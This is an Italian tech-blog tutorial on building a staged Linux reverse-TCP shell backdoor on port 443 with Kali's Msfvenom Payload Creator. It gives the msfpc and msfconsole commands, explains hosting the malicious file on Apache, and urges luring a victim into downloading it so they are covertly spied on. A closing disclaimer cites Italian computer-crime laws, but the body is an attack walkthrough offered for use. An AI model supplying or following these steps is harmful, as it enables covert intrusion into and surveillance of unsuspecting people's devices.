
linux-shell-staged-reverse-tcp-443-pl.rc
Oggi andremo a parlare di un altro tipo di backdoor, più precisamente della linux-shell-staged-reverse-tcp-443-pl.rc; possiamo creare questo file maligno sempre attraverso un programma eccellente contenuto nella libreria dei tools a disposizione di Kali Linux; stiamo parlando di Msfvenom Payload Creator e per avviarlo sarà necessario seguire questo percorso: Applicazioni>Strumenti di exploiting>Msfvenom Payload Creator. Una volta startata la console di MPC, il primo comando che andremo a digitare sarà: /usr/bin/msfpc verbose loop “indirizzo ip locale”
linux-shell-staged-reverse-tcp-443-pl.rc: i passi da seguire
Come ogni volta ricordo che il nostro indirizzo IP possiamo ottenerlo semplicemente digitando su di un nuovo terminale il comando “ifconfig”
Una volta eseguito il primo comando, procediamo con il secondo, dove andremo ad eseguire: msfconsole -q -r ‘/root/linux-shell-staged-reverse-tcp-443-pl.rc’
A questo punto possiamo andare nella cartella “home” e cercare la backdoor richiamata nel comando precedente
Una volta che avremo induviduato il file maligno riguardante questo attacco, dobbiamo trasferirlo nel percorso computer>var>www>html
Quindi apriremo un nuovo terminale e digitiamo il comando “service apache2 start”
Il terminale di Msfvenom Payload Creator, nel frattempo, è in ascolto, attendendo la captazione di informazioni dalla macchina remota sotto attacco; ma per arrivare a questo dovremo prima creare un link attraverso il quale la vittima, una volta cliccato, scaricherà il file che permetterà la connessione segreta tra il nostro PC e il suo dispositivo. Resta a voi scegliere in che modo far cadere nella trappola il mal capitato. Sta di fatto che una volta scaricata e aperta la backdoor, senza rendersene conto, chi subisce l’attacco comincerà ad essere spiato; i dati verranno captati dal terminale in ascolto e, se avete qualche dubbio sui comandi che potete eseguire sul dispositivo remoto, basterà digitare il comando help, sullo stesso terminale di MPC.
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI